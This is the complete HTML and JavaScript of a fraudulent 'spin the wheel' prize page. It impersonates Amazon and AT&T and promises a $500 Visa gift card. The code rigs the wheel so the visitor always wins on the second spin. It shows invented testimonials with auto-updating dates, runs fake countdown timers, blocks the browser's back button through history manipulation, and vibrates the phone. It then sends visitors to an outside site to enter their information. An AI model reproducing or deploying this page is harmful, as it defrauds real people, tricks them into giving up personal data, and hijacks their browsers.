<html>
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=1,user-scalable=no">
    <title>(1) Reward Available!</title>
    <script type="text/javascript" src="js/en_date.js"></script>
    <link rel="stylesheet" href="css/style__base.css">
    <link rel="stylesheet" type="text/css" href="css/style_a.css">
<div class="aheader">
                <style>
                    .aheader {
                        width: 100%;
                        height: 40px;
                        z-index: 8;
                        text-align: center;
                        background-color: #232f3e;
                        position: fixed;
                        top: 0px;
                    }
                    .menus {
                        float: left;
                        padding: 14px;
                    }
                    .menu {
                        display: block;
                        float: left;
                        width: 20px;
                        height: 20px;
                        background-position: -20px -378px;
                        margin-right: 10px;
                    }
                    .icon {
                        background-image: url(https://1.bp.blogspot.com/-Ybcjl-XGNc4/YEj3-sn0UNI/AAAAAAAAAXA/jHxxMUCtiIgaqtp80p1kTLm1cwkCWBYeACLcBGAsYHQ/s16000/icon_.png);
                        background-size: 275px;
                    }
                    .alogo {
                        display: block;
                        float: left;
                        height: 27px;
                        width: 80px;
                        background-position: -10px -50px;
                        margin-top: 13px;
                    }
                    .icon {
                        background-image: url(https://1.bp.blogspot.com/-Ybcjl-XGNc4/YEj3-sn0UNI/AAAAAAAAAXA/jHxxMUCtiIgaqtp80p1kTLm1cwkCWBYeACLcBGAsYHQ/s16000/icon_.png);
                        background-size: 275px;
                    }
                    .sign {
                        display: block;
                        float: right;
                        line-height: 48px;
                        font-size: 13px;
                        color: #fff;
                        font-family: inherit;
                    }
                    .cart {
                        display: block;
                        background-image: url(https://1.bp.blogspot.com/-Ybcjl-XGNc4/YEj3-sn0UNI/AAAAAAAAAXA/jHxxMUCtiIgaqtp80p1kTLm1cwkCWBYeACLcBGAsYHQ/s16000/icon_.png);
                        background-size: 275px;
                        background-position: -10px -240px;
                        width: 37px;
                        height: 27px;
                    }
                    .cart-count {
                        color: #f90;
                        text-align: center;
                        line-height: 10px;
                        font-weight: 700;
                        text-decoration: none;
                        padding: 0 0 0 6px;
                        font-size: 16px;
                        position: relative;
                        top: -5px;
                    }
                </style>
                <div class="menus"><span class="icon menu"></span></div>
                <span class="icon alogo"></span>
                <div style="float:right; padding:10px 18px 11px 12px">
                    <span class="cart"><span class="cart-count">0</span></span>
                </div>
                <div class="sign">Login</div>
            </div>
</head>
<body onload="setButtonHeight(), autospin1()">
<div class="spacer"></div>
<div class="wrapper">
<div id="container" class="contestwrap wrapper">
<div id="firstpage" class="toptext">
<table class="wrapper">
<tbody>
<tr>
<td align="center" valign="top"><b>Amazon Customers&amp;T User, you have (1) Reward Pending!<br /></b></td>
</tr>
</tbody>
</table>
<div>
<p class="wrapper">Every
<script language="Javascript" type="text/javascript">
                        document.write(dayarray[mydate.getDay()]);
                        </script>
we randomly choose 10 lucky visitors from to get a reward. <br /><br /></p>
<div class="yo">
<h2 style="margin: 0; padding: 0; padding-bottom: 3px;">Spin the wheel &amp;</h2>
<h2 style="margin: 0; padding: 0;"><span class="bounce">&darr;</span>Claim Your Prize <span class="bounce">&darr;</span></h2>
</div>
<p class="wrapper"><br /><br /></p>
</div>
<script type="text/javascript">
                function startTimer(t) {
                    var e, n, r = t,
                        a = setInterval(function() {
                            e = parseInt(r / 60, 10), n = parseInt(r % 60, 10), n = 10 > n ? "0" + n : n, $("#timerr").text(e + " minute and " + n + " seconds"), --r < 0 && (clearInterval(a))
                        }, 1e3)
                }
                startTimer((2 * 60) + 29);
                </script>
<div id="wheelCon"><img id="wheel" src="img/spin_vi.png" width="330" height="330" class="spinAround2 transparent" />
<div id="pressButton" style="top: 118.6px;"></div>
<div><img id="devMockup" class="animated rotateIn" src="img/card_vi.png" width="140" height="280" style="left: 98.5px; top: 125px;" /></div>
</div>
</div>
</div>
<div class="spacer"></div>
<div class="reviews wrapper">
<div class="wrapper">
<h2>Comments:</h2>
</div>
<table class="wrapper" style="padding-top: 8px;">
<tbody>
<tr>
<td width="50px" valign="top" align="right"><img class="roundimg" src="img/8.jpg" /></td>
<td align="left" valign="top" class="commentpad">
<div class="date">
<script>
                                mydate.setDate(mydate.getDate() - 0);
                                month = mydate.getMonth();
                                day = mydate.getDate();
                                if (day < 10) day = "0" + day;
                                document.write(montharray[month] + " " + day);
                                </script>
</div>
<div class="name">Gracie Aldrich</div>
<div class="text">My gift card came in the mail today!! I am amazed and grateful!!</div>
</td>
</tr>
</tbody>
</table>
<hr />
<table class="wrapper">
<tbody>
<tr>
<td width="50px" valign="top" align="right"><img class="roundimg" src="img/1.jpg" /></td>
<td align="left" valign="top" class="commentpad">
<div class="date">
<script>
                                mydate.setDate(mydate.getDate() - 2);
                                month = mydate.getMonth();
                                day = mydate.getDate();
                                if (day < 10) day = "0" + day;
                                document.write(montharray[month] + " " + day);
                                </script>
</div>
<div class="name">Margaret Young</div>
<div class="text">I thought this was a joke at first, but my gift card actually came into my mail this morning. #legit</div>
</td>
</tr>
</tbody>
</table>
<hr />
<table class="wrapper">
<tbody>
<tr>
<td width="50px" valign="top" align="right"><img class="roundimg" src="img/2.jpg" /></td>
<td align="left" valign="top" class="commentpad">
<div class="date">
<script>
                                document.write(montharray[month] + " " + day);
                                </script>
</div>
<div class="name">Jacob Lamm</div>
<div class="text">I'm not a gamer, but I just chose the PS4! Why not?! LOL</div>
</td>
</tr>
</tbody>
</table>
<hr />
<table class="wrapper">
<tbody>
<tr>
<td width="50px" valign="top" align="right"><img class="roundimg" src="img/4.jpg" /></td>
<td align="left" valign="top" class="commentpad">
<div class="date">
<script>
                                document.write(montharray[month] + " " + day);
                                </script>
</div>
<div class="name">George Miller</div>
<div class="text">Yesterday there was a delivery! I gave the gift card to my loveley wife's birthday... Love u babe )</div>
</td>
</tr>
</tbody>
</table>
<hr />
<table class="wrapper">
<tbody>
<tr>
<td width="50px" valign="top" align="right"><img class="roundimg" src="img/3.jpg" /></td>
<td align="left" valign="top" class="commentpad">
<div class="date">
<script>
                                document.write(montharray[month] + " " + day);
                                </script>
</div>
<div class="name">Roy Eyler</div>
<div class="text">It was easy, hope i get the gift card...</div>
</td>
</tr>
</tbody>
</table>
<hr />
<table class="wrapper">
<tbody>
<tr>
<td width="50px" valign="top" align="right"><img class="roundimg" src="img/5.jpg" /></td>
<td align="left" valign="top" class="commentpad">
<div class="date">
<script>
                                document.write(montharray[month] + " " + day);
                                </script>
</div>
<div class="name">Norah Miller</div>
<div class="text">Saw this one time offer and clicked it off because I thought it was fake. I saw the ad again and because I was bored so I decided to try it ... And I got a $1,000 gift card!!! Whaaaat!!?!</div>
</td>
</tr>
</tbody>
</table>
<hr />
<table class="wrapper">
<tbody>
<tr>
<td width="50px" valign="top" align="right"><img class="roundimg" src="img/6.jpg" /></td>
<td align="left" valign="top" class="commentpad">
<div class="date">
<script>
                                mydate.setDate(mydate.getDate() - 1);
                                month = mydate.getMonth();
                                day = mydate.getDate();
                                if (day < 10) day = "0" + day;
                                document.write(montharray[month] + " " + day);
                                </script>
</div>
<div class="name">Jamie Byrnes</div>
<div class="text">Thanks, that was fantastic :D God Bless</div>
</td>
</tr>
</tbody>
</table>
<hr />
<table class="wrapper">
<tbody>
<tr>
<td width="50px" valign="top" align="right"><img class="roundimg" src="img/7.jpg" /></td>
<td align="left" valign="top" class="commentpad">
<div class="date">
<script>
                                mydate.setDate(mydate.getDate() - 1);
                                month = mydate.getMonth();
                                day = mydate.getDate();
                                if (day < 10) day = "0" + day;
                                document.write(montharray[month] + " " + day);
                                </script>
</div>
<div class="name">Clarence Reck</div>
<div class="text">Fantastic! I never get lucky with anything, but I hope I am this time!!</div>
<img class="fbimg" src="img/smiley.png" /></td>
</tr>
</tbody>
</table>
</div>
</div>
<div style="height: 40px;"></div>
<div id="secondpage" class="wrapper">
<div class="congrats" style="padding-top: 5px;">
<h3><span style="color: #3c5a96;">Congratulations!<br />(1) <span style="color: red; font-weight: bold;">$500 Visa Gift Card to use at Amazon </span> has been reserved for you!</span></h3>
</div>
<div class="congrats" style="text-align: left; margin-top: 5px; margin-left: 5px;">
<p><b>Step 1:</b> Click the "CONTINUE" button to claim your prize.</p>
<p><b>Step 2:</b> Enter the correct information on the next page to claim your prize.</p>
<p style="padding-top: 10px;"><b>Important:</b> Hurry, limited quantities only!</p>
</div>
<div class="timer" style="margin-top: 5px; margin-left: 5px;">You only have <span style="color: green;"><b><span id="mins">5</span> minutes <span id="hsecs">30</span> seconds.</b></span></div>
<div class="prize">
<table>
<tbody>
<tr>
<th></th>
<td style="padding: 10px 5px 10px 0; text-align: center;"><img src="img/card_vi.png" style="max-width: 100px;" />
<p><b>2 remaining! </b></p>
</td>
<td style="line-height: 1.6;">
<p style="text-align: left;"><span class="name">$500 Visa Gift Card to use at Amazon </span></p>
<div><a href="https://getdiscnow.com/amazonredeemcodes" class="button" onclick="launchext(); exit_a1();">CONTINUE</a></div>
</td>
</tr>
</tbody>
</table>
</div>
</div>
<div class="sweet-overlay" style="opacity: 1.03; display:block;" tabindex="-1"></div>
<div class="sweet-alert animated bounceIn visible" id="modal01" style="top: 38%;"><img id="gift-image" src="img/card_vi.png" style="width: 70px;" /> <img id="gift-image2" src="img/refresh.png" style="width: 70px; display:none;" />
<h2 id="first-title" style="margin-top: -10px; padding-bottom: -5px; margin-bottom: 0;"></h2>
<p id="first-dialog"></p>
<div class="sa-button-container">
<div class="sa-confirm-button-container"><button onclick="hidemodal01()" class="modalbutton">OK</button>
<div class="la-ball-fall"></div>
</div>
</div>
</div>
<p>
<script src="js/jquery.min.js"></script>
<script>
    function hidemodal01() {
        var modal1 = document.getElementById("modal01").classList.remove("visible");
        var so = document.querySelector(".sweet-overlay").style.display = "none";
        spin();
    }
    function showmodal01() {
        var modal1 = document.getElementById("modal01").classList.add("visible");
        var so = document.querySelector(".sweet-overlay").style.display = "float";
    }
    function hidemodal02() {
        if (vibr > 0) navigator.vibrate(70);
        var modal2 = document.getElementById("modal02").classList.remove("visible");
        var so = document.querySelector(".sweet-overlay").style.display = "none";
    }
    function setButtonHeight() {
        conMid = (whCon.getBoundingClientRect().bottom - whCon.getBoundingClientRect().top) / 2, button.style.top = conMid - button.offsetHeight / 2 - 0.2 * button.offsetHeight / 2 + "px"
    }
    function spin() {
        switch (count) {
            case 1:
                dWheel.className = "spinAround",
                    setTimeout(function() {
                        document.getElementById("gift-image").style.display = "none";
                        document.getElementById("gift-image2").style.display = "";
                        document.getElementById("first-title").innerHTML = "Try again!";
                        document.getElementById("first-dialog").innerHTML = "Sorry.<p> Please try again. You still have 1 chance!";
                        document.getElementById("modal01").style.top = "55%";
                        showmodal01();
                    }, 6800);
                break;
            case 2:
                dWheel.className = "spinAround2", setTimeout(function() {
                    dWheel.className = dWheel.className + " transparent"
                }, 6800), setTimeout(function() {
                    device.style.display = "block", device.style.left = whCon.offsetWidth / 2 - device.offsetWidth / 2 + "px", device.style.top = conMid - device.offsetHeight / 2 + "px"
                }, 7000), setTimeout(function() {
                    first.innerHTML = "<img src='img/loading.gif'>", first.style.padding = "195px 0px", setTimeout(function() {
                        first.parentNode.removeChild(first), second.style.display = "block", con.insertBefore(second, con.firstChild);
                        setInterval("countdown()", 1000);
                    }, 1500)
                }, 9000)
        }
        count++
    }
    var 
        count = 1,
        conMid, headline = document.getElementById("headline"),
        con = document.getElementById("container"),
        whCon = document.getElementById("wheelCon"),
        dWheel = document.getElementById("wheel"),
        button = document.getElementById("pressButton"),
        device = document.getElementById("devMockup"),
        first = document.getElementById("firstpage"),
        second = document.getElementById("secondpage");
    function autospin1() {
        document.getElementById("pressButton").disabled = true;
        //document.getElementById( "first-title" ).innerHTML = "Visa Gift Card to use at Amazon Gift Card";
        document.getElementById("first-title").innerHTML = "$500 Visa Gift Card to use at Amazon ";
        document.getElementById("first-dialog").innerHTML = "<p>Congratulations  AT&T User! 🎉</p><p> National Consumer Center would like to thank you for your loyalty today, so we are giving out special rewards.</p><p> Spin the wheel and claim your special prize! 🎁</p><p><b> Good Luck!</b></p>";
        document.getElementById("modal01").style.top = "38%";
    }
    function autospin2() {
        spin();
    }
    </script>
<script>
    function countdown() {
        var a = parseInt(document.getElementById("mins").innerHTML),
            b = parseInt(document.getElementById("hsecs").innerHTML);
        0 != a && 0 == b ? (nmins = a - 1, nsecs = 59) : 0 != a || 0 != b ? (nmins = a, nsecs = b - 1) : 0 == a && 0 == b && (nmins = a, nsecs = b), document.getElementById("mins").innerHTML = nmins, document.getElementById("hsecs").innerHTML = nsecs, nsecs < 10 && (nsecs = "0" + nsecs)
    }
    </script>
<script type="text/javascript">
    function exit_a1() { window.onbeforeunload = null; }
    </script>
</p>
<script>
	navigator.vibrate([1000, 300, 1000, 300,1000]);
</script>
<style type="text/css">
	body{background-color: #000000;}
</style>
    <script>
history.pushState(null, null, location.href); history.back(); history.forward(); window.onpopstate = function () { history.go(1); }; 
	</script>
</body>
<!-- This landing page has been Generated using purelander.com -->
</html>